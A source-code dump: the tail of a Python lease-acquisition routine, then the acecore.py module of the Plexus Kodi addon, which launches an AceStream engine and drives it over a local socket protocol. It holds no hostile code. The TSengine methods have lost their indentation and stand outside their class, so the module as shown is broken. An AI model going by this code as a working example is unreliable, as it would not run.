    client = SimpleQueueClient(as_account=user_auth[0], user=user_auth[0], password=user_auth[1])

    # Ensure task lease exists for acquisition and create if not found
    lease_resp = client.describe_lease(lease_id)
    if not lease_resp:
        lease_resp = client.create_lease(lease_id)

    if not lease_resp:
        raise Exception('Cannot locate or create a lease with id {}'.format(lease_id))

    # Acquire the task lease and run the task
    lease = None
    try:
        my_id = get_threadbased_id() if client_id is None else client_id
        try:
            lease = client.acquire_lease(lease_id, client_id=my_id, ttl=ttl)
            if not lease:
                raise LeaseUnavailableError('Another owner holds lease {}, and did not release within timeout {}'.format(lease_id, ttl))
        except Exception as e:
            raise LeaseAcquisitionFailedError('Error during lease acquisition: {}'.format(e))

        logger.debug('Got lease: {}'.format(lease))
        t = time.time()
        logger.debug('Starting target={} with lease={} and client_id={}'.format(target.__name__, lease_id, lease['held_by']))
        handler_thread.start()

        if autorefresh:
            # Run the task thread and monitor it, refreshing the task lease as needed.
            # Fix: Thread.isAlive() was removed in Python 3.9; use is_alive().
            while handler_thread.is_alive():
                # If we're halfway to the timeout, refresh to have a safe buffer
                if time.time() - t > (ttl / 2):
                    # refresh the lease, with up to 3 attempts
                    for i in range(3):
                        try:
                            resp = client.refresh_lease(lease_id=lease['id'], client_id=lease['held_by'], epoch=lease['epoch'], ttl=ttl)
                            logger.debug('Lease {} refreshed with response: {}'.format(lease_id, resp))
                            if resp:
                                lease = resp
                                t = time.time()
                                break
                        except Exception:
                            logger.exception('Error updating lease {}'.format(lease['id']))
                    else:
                        # for/else: all retries exhausted without a break
                        logger.debug('Lease refresh failed to succeed after retries. Lease {} may be lost due to timeout'.format(lease_id))
                handler_thread.join(timeout=1)
        else:
            handler_thread.join()

        logger.debug('Target thread returned')
    except (LeaseAcquisitionFailedError, LeaseUnavailableError) as e:
        logger.debug('Could not acquire lease, but this may be normal: {}'.format(e))
        raise e
    except Exception as e:
        logger.debug('Attempting to get lease {} failed: {}'.format(lease_id, e))
        raise e
    finally:
        try:
            if lease:
                resp = client.release_lease(lease_id=lease['id'], client_id=lease['held_by'], epoch=lease['epoch'])
                logger.debug('Lease {} released with response: {}'.format(lease_id, resp))
            else:
                logger.debug('No lease found to release.')
        except Exception as e:
            logger.exception('Error releasing lease. Lease will expire on its own. Err: {}'.format(str(e)))
|
acecore.py
|
# -*- coding: utf-8 -*-
""" Plexus (c) 2015 enen92
This file contains the acestream console of the addon. Initial versions were coded by Nouismons; this file is based on his work.
Classes:
Logger() -> Log class
_TSPlayer(xbmc.Player) -> Inheritance of the xbmc.Player class for acestreams
TSengine() -> Acestreamengine class, start functions, etc
TSServ(threading.Thread) -> Acestreamengine service class
OverlayText(object) -> Overlaytext displayed on player
"""
import xbmcplugin
import xbmcgui
import xbmc
import xbmcaddon
import xbmcvfs
import httplib
import urllib
import urllib2
import re
import sys
import subprocess
import os
import socket
import threading
import time
import random
import json
from plexusutils.pluginxbmc import *
""" Fixed variables """
aceport=int(settings.getSetting('aceporta'))
server_ip=settings.getSetting('ip_addr')
if settings.getSetting('save')=='true': save=False
else: save=False
if settings.getSetting('debug_mode')=='true': alog=True
else: alog=False
if (sys.platform == 'win32') or (sys.platform == 'win64'): pwin=True
else: pwin=False
if xbmc.getCondVisibility('System.Platform.OSX'): posx=True
else: posx=False
""" Function and class list """
def show_Msg(heading, message, times = 3000, pics = addon_icon):
    """Show a Kodi notification popup; if UTF-8 encoding of the strings fails, retry with the raw values."""
    try: xbmc.executebuiltin('XBMC.Notification("%s", "%s", %s, "%s")' % (heading.encode('utf-8'), message.encode('utf-8'), times, pics.encode('utf-8')))
    except Exception, e:
        # Encoding failed (already-encoded or non-text input); fall back to the raw strings.
        print( '[%s]: ShowMessage: Transcoding UTF-8 failed [%s]' % (addon_id, e), 2 )
        try: xbmc.executebuiltin('XBMC.Notification("%s", "%s", %s, "%s")' % (heading, message, times, pics))
        except Exception, e:
            print( '[%s]: ShowMessage: exec failed [%s]' % (addon_id, e), 3 )
class Logger():
    """Minimal debug logger: prints '<name>:<message>' only when the addon debug flag (alog) is on."""
    def __init__(self,Name):
        # started/link appear unused by this class; kept for parity with the player classes - TODO confirm
        self.started=False
        self.name=Name
        self.link=None
    def out(self,txt):
        # Emit only when the module-level debug_mode setting was enabled.
        if alog:
            print "%s:%s"%(self.name,txt)
class _TSPlayer(xbmc.Player):
    """Kodi player subclass for acestream playback: queues engine commands (DUR/PLAYBACK) on playback events."""
    def __init__( self):
        self.started=False
        self.log=Logger("TSPlayer")
        self.log.out('init')
        self.active=True  # cleared when playback ends or is stopped; polled by TSengine.play_url_ind
        self.link=None    # acestream content link, set by the caller before playback
        self.vod=True     # video-on-demand mode: report duration to the engine
        self.duration=None
        self.coms=[]      # outgoing engine commands, drained by TSengine.loop()
        # NOTE(review): this constructs a throwaway Player object; presumably intended to force the
        # DVD player core, but the instance is discarded - confirm.
        if settings.getSetting('force_dvplayer') == 'true': xbmc.Player(xbmc.PLAYER_CORE_DVDPLAYER)
    def onPlayBackPaused( self ):
        self.log.out('paused')
    def onPlayBackStarted( self ):
        """On start: spawn the watcher thread, go fullscreen, and queue DUR/PLAYBACK 0 commands."""
        watcher_thread = threading.Thread(name='acestream_watcher', target=ace_control_thread).start()
        xbmc.executebuiltin('XBMC.ActivateWindow("fullscreenvideo")')
        self.started=True
        self.log.out('started')
        if self.vod:
            try:
                # Engine expects the duration in milliseconds.
                self.duration= int(xbmc.Player().getTotalTime()*1000)
                comm='DUR '+self.link.replace('\r','').replace('\n','')+' '+str(self.duration)
                self.coms.append(comm)
            except: pass
        comm='PLAYBACK '+self.link.replace('\r','').replace('\n','')+' 0'
        self.coms.append(comm)
        xbmc.sleep(2500)
    def onPlayBackResumed(self):
        self.log.out("play resume")
    def onPlayBackEnded(self):
        """Natural end of playback: report 100% to the engine and mark inactive."""
        self.log.out("play ended")
        self.active=False
        comm='PLAYBACK '+self.link.replace('\r','').replace('\n','')+' 100'
        self.coms.append(comm)
    def onPlayBackStopped(self):
        """User stop: mark inactive and close the engine-status overlay if shown."""
        self.log.out("play stop")
        self.active=False
        if settings.getSetting('engine-status') == "true":
            # lat123 is the module-global OverlayText created in play_url_ind.
            try:lat123._close()
            except:pass
    def __del__(self):
        self.log.out('delete')
class TSengine():
def __init__(self):
    """Stop any current playback, open the engine control socket, and wait until the player is free."""
    xbmc.Player().stop()
    self.log=Logger("TSEngine")
    self.push=Logger('OUT')
    self.alive=True
    self.progress = xbmcgui.DialogProgress()
    self.player=None
    self.files={}  # {url-encoded filename: index} as reported by the engine
    self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    self._sock.settimeout(3)
    self.progress.create(translate(30000),translate(30043))
    self.tsserv =None  # TSServ reader thread, created in ts_init()
    self.conn=False
    self.title=None
    self.filename=None
    self.mode=None  # engine START mode (e.g. 'PID', 'TORRENT'), set by the caller
    self.url=None
    self.local=False  # True when playing a locally saved copy instead of the engine stream
    self.saved=False
    self.canceled = False
    self.pos=[25,50,75,100]  # playback-percentage checkpoints reported to the engine in loop()
    l=False
    # Wait for any previous playback to fully stop before claiming the engine.
    while xbmc.Player().isPlaying():
        l=True
        if xbmc.abortRequested:
            self.log.out("XBMC asked to abort request")
            # NOTE(review): returning a non-None value from __init__ raises TypeError in Python;
            # likely intended only to abort construction - confirm.
            return False
        if self.progress.iscanceled():
            self.canceled = True
            return False
        xbmc.sleep(300)
    settings.setSetting('active','1')
    if l: xbmc.sleep(500)
def ts_init(self):
    """Handshake with the engine: start the reader thread, send HELLOBG, wait for the version, then send READY
    (with an auth key derived via SHA-1 when the engine requests one). Returns False on cancel/abort."""
    self.tsserv = TSServ(self._sock)
    self.tsserv.start()
    comm="HELLOBG"
    self.TSpush(comm)
    self.progress.update(0,translate(30044)," ")
    # Block until the engine announces its version (set by the TSServ reader thread).
    while not self.tsserv.version:
        if xbmc.abortRequested:
            self.canceled = True
            self.log.out("XBMC asked to abort request")
            return False
        if self.progress.iscanceled():
            self.canceled = True
            return False
        time.sleep(1)
    ready='READY'
    if self.tsserv.key:
        # Engine requested key auth: READY key=<pkey-prefix>-<sha1(engine_key + product_key)>
        import hashlib
        sha1 = hashlib.sha1()
        pkey=self.tsserv.pkey
        sha1.update(self.tsserv.key+pkey)
        key=sha1.hexdigest()
        pk=pkey.split('-')[0]
        key="%s-%s"%(pk,key)
        ready='READY key=%s'% key
    if self.progress.iscanceled():
        self.canceled = True
        self.err=1
        return False
    self.TSpush(ready)
    return True
def sm(self,msg):
    """Shorthand: show *msg* as an 'AceStream' Kodi notification."""
    show_Msg('AceStream',msg)
def connect(self):
    """Connect the control socket to the acestream engine, launching the engine for the
    current platform if needed, and retrying for up to ~40 seconds. Returns True on success."""
    # NOTE(review): this local shadows the module-level server_ip and is never used - confirm.
    server_ip='127.0.0.1'
    servip=settings.getSetting('ip_addr')
    aceport=int(settings.getSetting('aceporta'))
    self.log.out('Trying to connect')
    self.progress.update(0,translate(30045),' ')
    if pwin:
        # Windows: start the engine and read the actual port it bound from its port file.
        res=self.startWin()
        aceport=self.getWinPort()
        if not aceport:
            res=self.startWin()
            if not res: return False
    elif posx:
        # OSX: engine runs under Wine; same start-then-read-port dance.
        res=self.startosx()
        aceport=self.getosxPort()
        if not aceport:
            res=self.startosx()
            if not res: return False
    else:
        # Linux/Android: try connecting first; only launch the engine if that fails.
        self.log.out('try to connect to Linux engine')
        self.log.out('Connecting to %s:%s'%(servip,aceport))
        try:
            self._sock.connect((servip, aceport))
            self.log.out('Connected to %s:%s'%(servip,aceport))
            return True
        except:
            res=self.startLin()
            if not res: return False
    # Retry loop: up to ~40 attempts, one second apart, re-reading the port file each time.
    i=40
    while (i>1):
        self.progress.update(0,translate(30046),translate(30047) + str('%s'%i) + ' ' + translate(30048) )
        try:
            if pwin: aceport=self.getWinPort()
            elif posx: aceport=self.getosxPort()
            self._sock.connect((servip, aceport))
            self.log.out('Connected to %s:%s'%(servip,aceport))
            i=0
            return True
        except:
            self.log.out('Failed to connect to %s:%s'%(servip,aceport))
            if self.progress.iscanceled():
                self.canceled = True
                return False
                # NOTE(review): unreachable after return - confirm original intent.
                break
            i=i-1
            xbmc.sleep(1000)
            if xbmc.getCondVisibility('system.platform.OSX'):
                # On OSX, periodically re-attempt starting the engine while waiting.
                j = [33,30,27,24,21,18,15,12,9,6,3]
                if i in j:
                    print("another attempt to start osx engine..")
                    self.startosx()
    # All attempts failed: recycle the socket so a later connect() starts clean.
    self._sock.close()
    self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    self.sm('Cant connect')
    return False
def getosxPort(self):
    """Read the engine's listening port from the acestream.port file inside the OSX Wine prefix.
    Returns the port as int, or False if the file is missing/unreadable."""
    try:
        path=os.path.join('/Applications','Ace Stream.app','Contents','Resources','wineprefix','drive_c','users','IGHOR','Application Data','ACEStream','engine')
        pfile= os.path.join( path,'acestream.port')
        gf = open(pfile, 'r')
        aceport=int(gf.read())
    except:
        return False
    self.log.out('get aceport - %s'%aceport)
    return aceport
def startosx(self):
    """Launch the Windows engine binary under the bundled Wine on OSX. Returns True if spawned."""
    self.log.out('try to start OSX engine')
    import subprocess
    comd = [os.path.join('/Applications','Ace Stream.app','Contents','Resources','Wine.bundle','Contents','Resources','bin','wine'),os.path.join('/Applications','Ace Stream.app','Contents','Resources','wineprefix','drive_c','users','IGHOR','Application Data','ACEStream','engine','ace_engine.exe')]
    print comd
    try:
        self.proc = subprocess.Popen(comd,shell=False)
    except:
        self.sm('Not Installed')
        self.log.out('Not Installed')
        self.progress.update(0,'AceStream not installed','')
        return False
    self.log.out('Engine starting')
    return True
def startLin(self):
    """Launch the acestream engine on Linux-family platforms, choosing the command per platform:
    Android activity/script, ARM start script, OpenELEC x86 start script, or a generic binary.
    Download/upload rate limits from the addon settings are appended where supported."""
    self.log.out('try to start Lin engine')
    import subprocess
    if xbmc.getCondVisibility('System.Platform.Android'):
        try:
            # Prefer launching the installed engine app; otherwise run the bundled droidace.sh script.
            if settings.getSetting('engine_app') == "1"and settings.getSetting("acemedia") == "1": xbmc.executebuiltin('XBMC.StartAndroidActivity("org.acestream.media")')
            elif settings.getSetting('engine_app') == "1"and settings.getSetting("acemedia") == "0": xbmc.executebuiltin('XBMC.StartAndroidActivity("org.acestream.engine")')
            else:
                command = ["sh","/data/data/"+settings.getSetting('app_id')+"/files/program.plexus/org.acestream.engine/files/droidace.sh",settings.getSetting('app_id')]
                if settings.getSetting('total_max_download_rate') != "0":
                    command.append('--download-limit')
                    command.append(settings.getSetting('total_max_download_rate'))
                if settings.getSetting('total_max_upload_rate') != "0":
                    command.append('--upload-limit')
                    command.append(settings.getSetting('total_max_upload_rate'))
                self.proc = subprocess.Popen(command)
        except:
            self.sm("Not installed")
            self.log.out("Not installed")
            self.progress.update(0,"Acestreamengine.apk not installed","")
    else:
        print("Linux not android..")
        if "arm" in os.uname()[4]:
            # ARM devices: dedicated start script shipped in the addon profile folder.
            try:
                command = ["sh",os.path.join(pastaperfil,"acestream","start_acestream.sh"),"--client-console"]
                if settings.getSetting('total_max_download_rate') != "0":
                    command.append('--download-limit')
                    command.append(settings.getSetting('total_max_download_rate'))
                if settings.getSetting('total_max_upload_rate') != "0":
                    command.append('--upload-limit')
                    command.append(settings.getSetting('total_max_upload_rate'))
                self.proc = subprocess.Popen(command)
            except:
                self.sm("Not installed")
                self.log.out("Not installed")
                self.progress.update(0,"Acestream engine not installed")
        elif settings.getSetting('openeleci386') == "true" or settings.getSetting('openelecx86_64') == "true":
            # OpenELEC x86: generic start.sh from the profile folder.
            try:
                command = ["sh",os.path.join(pastaperfil,'acestream','start.sh')]
                if settings.getSetting('total_max_download_rate') != "0":
                    command.append('--download-limit')
                    command.append(settings.getSetting('total_max_download_rate'))
                if settings.getSetting('total_max_upload_rate') != "0":
                    command.append('--upload-limit')
                    command.append(settings.getSetting('total_max_upload_rate'))
                self.proc = subprocess.Popen(command)
            except:
                self.sm("Not installed")
                self.log.out("Not installed")
                self.progress.update(0,"Acestream engine not installed")
        else:
            print("Not armv7 or armv6")
            # Generic Linux: bundled binary, PATH binary, or a user-supplied command line.
            if settings.getSetting('ace_cmd') == "0":
                acefolder = os.path.join(pastaperfil,'acestream')
                acebin = os.path.join(pastaperfil,'acestream','acestreamengine')
                command = [acebin,'--client-console','--lib-path',acefolder]
                if settings.getSetting('total_max_download_rate') != "0":
                    command.append('--download-limit')
                    command.append(settings.getSetting('total_max_download_rate'))
                if settings.getSetting('total_max_upload_rate') != "0":
                    command.append('--upload-limit')
                    command.append(settings.getSetting('total_max_upload_rate'))
                print command
            elif settings.getSetting('ace_cmd') == "1": command = ["acestreamengine","--client-console"]
            elif settings.getSetting('ace_cmd') == "2": command = settings.getSetting('ace_cmd_alternative').split(' ')
            try:
                self.proc = subprocess.Popen(command)
            except:
                self.sm('Not Installed')
                self.log.out('Not Installed')
                self.progress.update(0,'AceStream not installed','')
                return False
    self.log.out('Engine starting')
    return True
def startWin(self):
    """Launch ace_engine.exe on Windows via os.startfile. Returns True if the launch was issued."""
    try:
        needed_value='ace_engine.exe'
        path_value=os.path.join(pastaperfil,'acestream',needed_value)
        self.log.out("Try to start %s"%needed_value)
        self.progress.update(0,'Starting ASEngine','')
        os.startfile(path_value)
        self.log.out('AceStream Engine starting')
    except:
        self.sm('Not Installed')
        self.log.out('Not Installed')
        self.progress.update(0,'AceStream not installed','')
        return False
    return True
def getWinPort(self):
    """Read the engine's listening port from acestream.port in the addon profile folder.
    Returns the port as int, or False if the file is missing/unreadable."""
    try:
        path=os.path.join(pastaperfil,'acestream')
        pfile= os.path.join( path,'acestream.port')
        gf = open(pfile, 'r')
        aceport=int(gf.read())
    except:
        return False
    self.log.out('get aceport - %s'%aceport)
    return aceport
def TSpush(self,command):
    """Send one CRLF-terminated command line to the engine over the control socket (best-effort)."""
    self.push.out(command)
    try:
        self._sock.send(command+'\r\n')
    except:
        self.push.out("!!!Error!!!")
def get_link(self, index=0, title='', icon='', thumb=''):
    """Ask the engine to START the current content at *index* and block until a playable URL
    arrives (or the user cancels / an error occurs). Optionally asks the engine to SAVE the
    stream to disk and waits for the local file. Returns the playable URL/path, or False."""
    self.title=title
    self.log.out("play")
    self.tsserv.ind=index
    self.progress.update(89,translate(30049),'')
    # Resolve the filename for this index from the engine's file listing.
    for k,v in self.files.iteritems():
        if v==index: self.filename=urllib.unquote(k).replace('/','_').replace('\\','_')
    # Normalize the filename encoding; fall back to a dummy name if undecodable.
    try:
        avail=os.path.exists(self.filename.decode('utf-8'))
    except:
        try:
            avail=os.path.exists(self.filename)
            self.filename=self.filename.encode('utf-8')
        except: self.filename='temp.avi'
    self.log.out('Starting file:%s'%self.filename)
    try: self.filename=settings.getSetting('folder')+self.filename
    except:
        self.filename=None
        save=False
    self.log.out('Get filename to save:%s'%self.filename)
    # Non-PID modes need three extra zero parameters on the START command.
    spons=''
    if self.mode!='PID': spons=' 0 0 0'
    comm='START '+self.mode+ ' ' + self.url + ' '+ str(index) + spons
    self.TSpush(comm)
    self.progress.update(89,translate(30050),'')
    # Wait for the TSServ reader thread to receive the playback URL, showing engine progress.
    while not self.tsserv.got_url and not self.progress.iscanceled() and not self.tsserv.err:
        self.progress.update(int(self.tsserv.proc),self.tsserv.label,self.tsserv.line)
        xbmc.sleep(200)
        if self.progress.iscanceled():
            self.canceled = True
        if xbmc.abortRequested:
            self.log.out("XBMC is shutting down")
            self.canceled = True
            break
    if self.tsserv.err:
        self.sm('Failed to load file')
        self.canceled = True
    self.progress.update(100,translate(30049),'')
    # Re-read the save setting (module-level value may be stale).
    if settings.getSetting('save')=='true': save=True
    else: save=False
    if self.tsserv.event and save:
        # Ask the engine to save the stream, then wait for the file to materialize on disk.
        self.progress.update(0,translate(30051)," ")
        comm='SAVE %s path=%s'%(self.tsserv.event[0]+' '+self.tsserv.event[1],urllib.quote(self.filename))
        self.TSpush(comm)
        self.tsserv.event=None
        succ=True
        while not os.path.exists(self.filename.decode('utf-8')) and not self.progress.iscanceled():
            if xbmc.abortRequested or self.progress.iscanceled():
                self.log.out("XBMC asked to abort request")
                succ=False
                self.canceled = True
                break
            xbmc.sleep(200)
        if not succ: return False
        # Play the saved local copy instead of the engine stream.
        self.tsserv.got_url=self.filename.decode('utf-8')
        self.local=True
    self.active=True
    self.progress.close()
    return self.tsserv.got_url
def play_url_ind(self, index=0, title='', icon='', thumb=''):
    # Resolve file `index` to a URL via get_link() and start playback,
    # supervising the player loop until playback ends or XBMC aborts.
    # Returns False when the link could not be resolved.
    self.lnk=self.get_link(index,title,icon,thumb)
    if not self.lnk: return False
    # aceplay_type 1: rewrite the engine's default port 6878 to the
    # user-configured player port.
    if settings.getSetting('aceplay_type') == str(1):
        if ":6878/" in self.lnk: self.lnk = self.lnk.replace(":6878",":" + settings.getSetting('playerport'))
    if self.progress:self.progress.close()
    item = xbmcgui.ListItem(title,iconImage="DefaultVideo.png", thumbnailImage=thumb)
    item.setPath(path=self.lnk)
    # Optional engine-status overlay shown over the video OSD.
    if settings.getSetting('engine-status') == "true":
        global lat123
        lat123 = OverlayText()
    xbmcplugin.setResolvedUrl(int(sys.argv[1]),True,item)
    xbmc.sleep(100)
    self.player=_TSPlayer()
    self.player.vod=True
    self.player.link=self.tsserv.got_url
    self.log.out('play')
    self.player.link=self.lnk  # NOTE(review): immediately overwrites the line above
    if self.progress:self.progress.close()
    # sys.argv[1] < 0 means we were not invoked as a resolvable plugin URL,
    # so start the player directly — presumably; TODO confirm against caller.
    if self.local:
        if int(sys.argv[1]) < 0:
            xbmc.Player().play(self.lnk,item)
    else:
        xbmc.sleep(50)
        if int(sys.argv[1]) < 0:
            self.player.play(self.lnk,item)
    show_window = False
    # Supervision loop: toggle the overlay with the video OSD, push queued
    # engine commands via loop(), and bail out on abort.
    while self.player.active and not self.local:
        if settings.getSetting('engine-status') == "true":
            if show_window == False and xbmc.getCondVisibility('Window.IsActive(videoosd)'):
                lat123.show()
                show_window = True
            elif not xbmc.getCondVisibility('Window.IsActive(videoosd)'):
                try:
                    lat123.hide()
                except: pass
                show_window = False
        self.loop()
        xbmc.sleep(300)
        if xbmc.abortRequested:
            self.canceled = True
            self.log.out("XBMC asked to abort request")
            break
    self.log.out('ended play')
def loop(self):
    # One tick of the playback supervision loop: forward queued player
    # commands to the engine, report playback position milestones, handle
    # a pending "cansave" event, and switch over to the saved local file
    # once it exists.
    #
    # Fix: the original referenced an undefined local `save` (it was only
    # ever assigned in get_link), raising NameError whenever a save event
    # was pending. Derive it from settings, as get_link does.
    save = settings.getSetting('save') == 'true'
    pos = self.pos
    # Forward one queued command from the player to the engine per tick.
    if len(self.player.coms) > 0:
        comm = self.player.coms[0]
        self.player.coms.remove(comm)
        self.TSpush(comm)
    if self.player.isPlaying():
        # Current position as an integer percentage of total time.
        if self.player.getTotalTime() > 0:
            cpos = int((1 - (self.player.getTotalTime() - self.player.getTime()) / self.player.getTotalTime()) * 100)
        else:
            cpos = 0
        # Report each milestone percentage to the engine exactly once.
        if cpos in pos:
            pos.remove(cpos)
            comm = 'PLAYBACK ' + self.player.link.replace('\r', '').replace('\n', '') + ' %s' % cpos
            self.TSpush(comm)
    # Engine signalled the content can be saved and the user opted in.
    if self.tsserv.event and save:
        self.log.out('Try to save file in loop')
        comm = 'SAVE %s path=%s' % (self.tsserv.event[0] + ' ' + self.tsserv.event[1], urllib.quote(self.filename))
        self.TSpush(comm)
        self.tsserv.event = None
        self.saved = True
    # Once the saved file exists on disk, hand playback over to it.
    if self.saved and self.player.started:
        self.log.out('saving content')
        if self.player.isPlaying() and os.path.exists(self.filename.decode('utf-8')):
            xbmc.sleep(10000)
            self.log.out('Start local file')
            self.tsserv.got_url = self.filename
            self.local = True
            self.sm('Start Local File')
            try: time1 = self.player.getTime()
            except: time1 = 0
            i = xbmcgui.ListItem("***%s" % self.title)
            # Resume the local file from the current stream position.
            i.setProperty('StartOffset', str(time1))
            self.log.out('Play local file')
            self.local = True
            self.player.active = False
def load_torrent(self, torrent, mode, host=server_ip, port=aceport ):
    # Connect to the AceStream engine and load `torrent` (URL / PID /
    # infohash depending on `mode`), then build self.files mapping the
    # decoded file names to their indices.
    # Returns "Ok" on success, False on any failure or cancellation.
    # Fix: renamed the loop variable `list`, which shadowed the builtin.
    self.mode = mode
    self.url = torrent
    if not self.connect():
        return False
    if not self.ts_init():
        self.sm('Initialization Failed')
        return False
    self.conn = True
    self.progress.update(0, translate(30052), "")
    # Non-PID modes require three extra zero arguments.
    if mode != 'PID': spons = ' 0 0 0'
    else: spons = ''
    comm = 'LOADASYNC ' + str(random.randint(0, 0x7fffffff)) + ' ' + mode + ' ' + torrent + spons
    self.TSpush(comm)
    # Wait for the reader thread to publish the file list (or an error).
    while not self.tsserv.files and not self.progress.iscanceled():
        if xbmc.abortRequested:
            self.log.out("XBMC is shutting down")
            self.canceled = True
            break
        if self.tsserv.err:
            self.canceled = True
            self.log.out("Failed to load files")
            break
        xbmc.sleep(200)
    if self.progress.iscanceled():
        self.canceled = True
        return False
    if not self.tsserv.files:
        self.sm('Failed to load list files')
        self.canceled = True
        return False
    self.filelist = self.tsserv.files
    self.file_count = self.tsserv.count
    self.files = {}
    self.progress.update(89, translate(30053), '')
    # Each entry is a [name, index] pair from the engine's LOADRESP JSON.
    if self.file_count > 1:
        flist = json.loads(self.filelist)
        for entry in flist['files']:
            self.files[urllib.unquote_plus(urllib.quote(entry[0]))] = entry[1]
    elif self.file_count == 1:
        flist = json.loads(self.filelist)
        entry = flist['files'][0]
        self.files[urllib.unquote_plus(urllib.quote(entry[0]))] = entry[1]
    self.progress.update(100, translate(30054), '')
    return "Ok"
def end(self):
    # Shut down the engine session: send SHUTDOWN, close the socket, stop
    # and join the reader thread, close UI elements, and (optionally) kill
    # the engine process if the user cancelled.
    self.active=False
    comm='SHUTDOWN'
    if self.conn:self.TSpush(comm)
    self.log.out("Ending")
    try: self._sock.shutdown(socket.SHUT_WR)
    except: pass
    if self.tsserv: self.tsserv.active=False
    if self.tsserv: self.tsserv.join()
    self.log.out("end thread")
    self._sock.close()
    self.log.out("socket closed")
    if self.progress:self.progress.close()
    if settings.getSetting('engine-status') == "true":
        try:lat123._close()
        except:pass
    if self.canceled: stop_aceengine()
def __del__(self):
    # Record in the addon settings that no session is active any more.
    settings.setSetting('active','0')
class TSServ(threading.Thread):
    # Reader thread for the AceStream engine's line-based TCP protocol.
    # Receives '\r\n'-terminated commands from the engine socket, parses
    # them in exec_com(), and publishes the results (version, key, file
    # list, stream URL, progress stats) as attributes polled by the owner.
    def __init__(self,_socket):
        # Product key sent during the handshake (engine API requirement).
        self.pkey='n51LvQoTlJzNGaFxseRK-uvnvX-sD4Vm5Axwmc4UcoD-jruxmKsuJaH0eVgE'
        threading.Thread.__init__(self)
        self.log=Logger("TSServer")
        self.inc=Logger('IN')
        self.log.out("init")
        self.sock=_socket
        self.daemon = True
        self.active = True      # cleared by end() to stop run()
        self.err = False        # set on protocol/engine errors
        self.buffer=65020       # recv() chunk size
        self.temp=""            # accumulator for partial lines
        self.msg=None           # last full line received
        self.version=None       # engine version from HELLOTS
        self.fileslist=None     # raw LOADRESP JSON while being parsed
        self.files=None         # parsed file-list JSON (one line)
        self.key=None           # engine auth key from HELLOTS
        self.count=None         # number of files in the torrent
        self.ind=None           # index of the file being played
        self.got_url=None       # stream URL/path from START/PLAY
        self.event=None         # pending 'cansave' event payload
        self.proc=0             # progress percentage for STATUS updates
        self.label=''           # progress dialog main label
        self.line=''            # progress dialog secondary line
        self.pause=False
    def run(self):
        # Receive loop: split the byte stream into '\r\n'-terminated
        # commands, buffering partial lines in self.temp.
        while self.active and not self.err:
            try:
                self.last_received=self.sock.recv(self.buffer)
            except: self.last_received=''
            ind=self.last_received.find('\r\n')
            cnt=self.last_received.count('\r\n')
            if ind!=-1 and cnt==1:
                # Exactly one complete line: prepend any buffered partial.
                self.last_received=self.temp+self.last_received[:ind]
                self.temp=''
                self.exec_com()
            elif cnt>1:
                # Several lines in one chunk: execute each in turn.
                fcom=self.last_received
                ind=1
                while ind!=-1:
                    ind=fcom.find('\r\n')
                    self.last_received=fcom[:ind]
                    self.exec_com()
                    fcom=fcom[(ind+2):]
            elif ind==-1:
                # No terminator yet: keep buffering.
                self.temp=self.temp+self.last_received
            self.last_received=None
        self.log.out('Daemon Dead')
    def exec_com(self):
        # Dispatch one received engine command line.
        self.inc.out(self.last_received)
        line=self.last_received
        comm=self.last_received.split(' ')[0]
        params=self.last_received.split(' ')[1::]
        self.msg=line
        if settings.getSetting('debug_mode') == "true":
            print('Sent command: ' + str(comm))
        if comm=='HELLOTS':
            # Handshake response: extract engine version and auth key.
            try: self.version=params[0].split('=')[1]
            except: self.version='1.0.6'
            try:
                match = re.compile('key=(.*)').findall(line)
                self.key = match[0].split(' ')[0]
            except: self.key=None
        elif comm=='LOADRESP':
            # Async load result: JSON payload starting at the first '{'.
            fil = line
            ll= fil[fil.find('{'):len(fil)]
            self.fileslist=ll
            json_files=json.loads(self.fileslist)
            try:
                aa=json_files['infohash']
                # status 2: multi-file torrent; 1: single file; 0: failure.
                if json_files['status']==2:
                    self.count=len(json_files['files'])
                if json_files['status']==1:
                    self.count=1
                if json_files['status']==0:
                    self.count=None
                self.files=self.fileslist.split('\n')[0]
                self.fileslist=None
                self.log.out("files:%s"%self.files)
            except:
                self.count=None
                self.fileslist=None
                self.err=True
        elif comm=='EVENT':
            # 'cansave' carries the event only for the file being played.
            if self.last_received.split(' ')[1]=='cansave':
                event=self.last_received.split(' ')[2:4]
                ind= event[0].split('=')[1]
                if int(ind)==int(self.ind): self.event=event
            if self.last_received.split(' ')[1]=='getuserdata':
                self.sock.send('USERDATA [{"gender": 1}, {"age": 3}]\r\n')
        elif comm=='START' or comm=='PLAY':
            # Stream is ready: rewrite loopback to the configured address.
            servip=settings.getSetting('ip_addr')
            self.got_url=self.last_received.split(' ')[1].replace('127.0.0.1',servip) #
            self.log.out('Get Link:%s'%self.got_url)
            self.params=self.last_received.split(' ')[2:]
            if 'stream=1' in self.params: self.log.out('Live Stream')
            else: self.log.out('VOD Stream')
        elif comm=='RESUME': self.pause=0
        elif comm=='PAUSE': self.pause=1
        if comm=="STATUS": self.showStats(line)
    def showStats(self,params):
        # Parse a STATUS line into progress fields and, when enabled, feed
        # the on-screen overlay. The payload is ';'-separated; field
        # positions differ per state (prebuf/dl/buf).
        params=params.split(' ')[1]
        ss=re.compile('main:[a-z]+',re.S)
        s1=re.findall(ss, params)[0]
        st=s1.split(':')[1]
        self.proc=0
        self.label=" "
        self.line=" "
        if st=='idle':
            self.label=translate(30055)
            if settings.getSetting('debug_mode') == "true":
                print('Received command Engine idle' )
        elif st=='starting':
            self.label=translate(30056)
            if settings.getSetting('debug_mode') == "true":
                print('Received command starting TS' )
        elif st=='err':
            self.label=translate(30057)
            self.err="dl"
            if settings.getSetting('debug_mode') == "true":
                print('Received command ERROR!' )
        elif st=='check':
            self.label=translate(30058)
            self.proc=int(params.split(';')[1])
            if settings.getSetting('debug_mode') == "true":
                print('Received command check' )
        elif st=='prebuf':
            # +0.1 nudges the progress bar so it visibly differs from 'check'.
            self.proc=int( params.split(';')[1] )+0.1
            self.label=translate(30059)
            self.line='Seeds:%s Download:%sKb/s'%(params.split(';')[8],params.split(';')[5])
            engine_data = { "action": str(translate(30059)), "percent": str(params.split(';')[1])+ "%","download":str(params.split(';')[5]) + " Kb/s", "upload":str(params.split(';')[7]) + " Kb/s","seeds":str(params.split(';')[8]),"total_download":str(int(params.split(';')[10])/(1024*1024))+'Mb',"total_upload":str(int(params.split(';')[12])/(1024*1024))+'Mb' }
            if settings.getSetting('debug_mode') == "true":
                print('Received command: ' + str(engine_data) )
        elif st=='loading':
            self.label=translate(30053)
